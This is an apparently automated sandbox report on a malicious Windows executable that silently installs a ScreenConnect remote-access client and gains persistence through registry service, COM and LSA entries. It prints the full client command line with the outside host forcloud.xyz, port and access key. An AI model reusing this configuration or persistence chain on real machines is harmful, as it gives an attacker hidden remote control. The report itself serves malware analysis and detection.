Malware Analysis Report

2024-12-07 11:38

Sample ID: 241113-vmr13syqhj
Target: 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe
SHA256: 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3
Tags: discovery persistence privilege_escalation
Score: 8/10


Analysis Overview

Score: 8/10

SHA256: 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3

Threat Level: Likely malicious

The file 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery persistence privilege_escalation

Sets service image path in registry

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Boot or Logon Autostart Execution: Authentication Package

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-13 17:06

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-13 17:06

Reported: 2024-11-13 17:09

Platform: win10v2004-20241007-en

Max time kernel: 111s

Max time network: 140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

Signatures

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnoPzfbU0UESngtSsivoO5gAAAAACAAAAAAAQZgAAAAEAACAAAACMXUi7ETvxIB%2bqn0%2f4S0iNfqKstNOmK8Ytl0mIiAc5wAAAAAAOgAAAAAIAACAAAAAWpEL%2bTZN7p2UOT%2fi7hX4VRRV6qFZzedY0sji3HVAdpqAEAAD7aSvNJLP2ZQ6swvThoUS52GUH%2bUF9UIpZPvVglRWbjOXKtq3FqdZ0Qg%2fYtuEDhFLX2yCI4eUVbKjtG%2blhrt9nES5pa5XjHAKqrggXThuZCXqAnZjhJDySakpBIOoeBTCslxvDZBqNsqIVbUl5v%2fFAwPb4TWiThCQF6t1SnE3LDhCKe5ExVTUACx4DBhZpxSnokagxeOXZNY1FU7ymTz8fwOOAWZLQ6Xw%2fvEL6xjsYaWFSeZfrAWsrs8Prs7X005eTmWf77Q%2bTrzY5OA5WG%2fCQrVA%2fmL5l4EYdAyZwZsuD72uWuQGITDKLgegmsXVRmlX%2f9I9dcjcjgi4T5xhzVQH9ca6t%2fGwFRKtuj7RslmhMCEhLTe3%2fXtcsKrLnj0GOsVn0vA9jK4T%2b79nij%2b7Xmou8XaG3G5YGxcSvUbopu11X4Pj3tpgqz3cjY%2fYQAchy5YQFMR3n0ClhsGissNx0sYzpfxhUDOoZpG%2fGUGYnvUrf1UULm4%2fNuuJiV0KOicLLJcqEnKcV1oiR4k6IKgLe%2fu6%2fb%2fE0D%2foeUbzWnVw8f8%2bTe28t5GiIdduZ0TxtpNJObGbo4cYmSQQoskPyv%2fEIbfA2MT2IaRuTDlwQUpWZCv%2bGaOlXeoKXEmXkGHlq%2f6ym2xYBfCDWEPAwStn8vgJQQ0cmZX6xz%2fFSgUcd0NPJCqpp0kFtVvsVwnmHTxv7StgkiL33NYxYQZmjBOF4DcYBaZ8EUDwfk%2b%2f7cWLcUnrBkdeju1voWqaLga%2frU%2foPgW2%2b10aJofoLcwdtHG%2fipG9tA4K1CnfP9Pqm%2bQmtMMWt8g3SWyBRZZjfKiErFi7Q0GN9PQheK9gaMVFlisKGMvLBU4WZXSu7vmIh4kunw3Jj1Dc5WPxmwtUo%2bkcdCAAzFwRjbPHXvAafCeXIQUMdPz5GXQvq6RAXOqJPJuK2fx0M6HtdVwAFuMrEFG4cpgx%2bN6Uawns%2bMftnROnGB9VHr0J%2fcWixSmpfIisvg9BoSq2gT%2b3%2bFLpiN33h6ipP4PGOkCMeA8xVGgh
aqFtyyeW1BU1zVOZmwaLQ1t42ARQ5EFxbiFOSzrjByEcAD%2fFAPo3IXfE22nv7OaCW2mIjOSbjCycp2EyB1arYek%2bZcZ3nHMX77RKK8ZcTaBDBdVUMYZym7NOkjwUn3jyG2zRzT%2bZPyt0frEOqgjafpgvMJ5RhgjlaRGy%2fOWOMGa%2flgsAS9mxIFdFeR4cQlqfzdbjd%2fc2vJn%2fcikNtbwtt7csWOFpTXeD5s2L%2fZJr2Pd0%2bN12ysbuTkhHkSU78FpB%2fwmzOzFx9DwmSZEMtW%2bJzQCI2VcA%2bbGenbiZhzKtDkNpWLlyqkUkRC5CHoMAUG7M2RX9ZNtZu2ibEqHZ6ib1kgOLVykT3CyatN%2bPvtDRkxgo32Ll994NOA7hmBPmJMydHJKnBTfavNV7yXqG9lj9ClHU4C%2bEsbcrtnDt5wJH9cAzgoNiTWlfC9Z55sn%2bPhwoGxYXna4Uo88%2b0l9hbBKiG0sX87Fs6EQCqdM9cJ8bJQSsji1427sZs%2fJ0%2bapcgu3X1dQPLJJRA%2fZyS930D5qdAd0uRs1DwWtI4JIuLZUAAAAAHwzA80IduPMKF5viypC0RW9XUib4Dgd0qcpeUKvpEMTdH%2b9Y%2b4A5MJC2MH1agmEObt4M0YDlW2%2blt1zwcvvML&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIFD1E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\e57fbb7.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57fbb5.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57fbb5.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFCCF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI136.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{27FF5BC2-C647-2B99-83BE-DDEA87E94140} C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
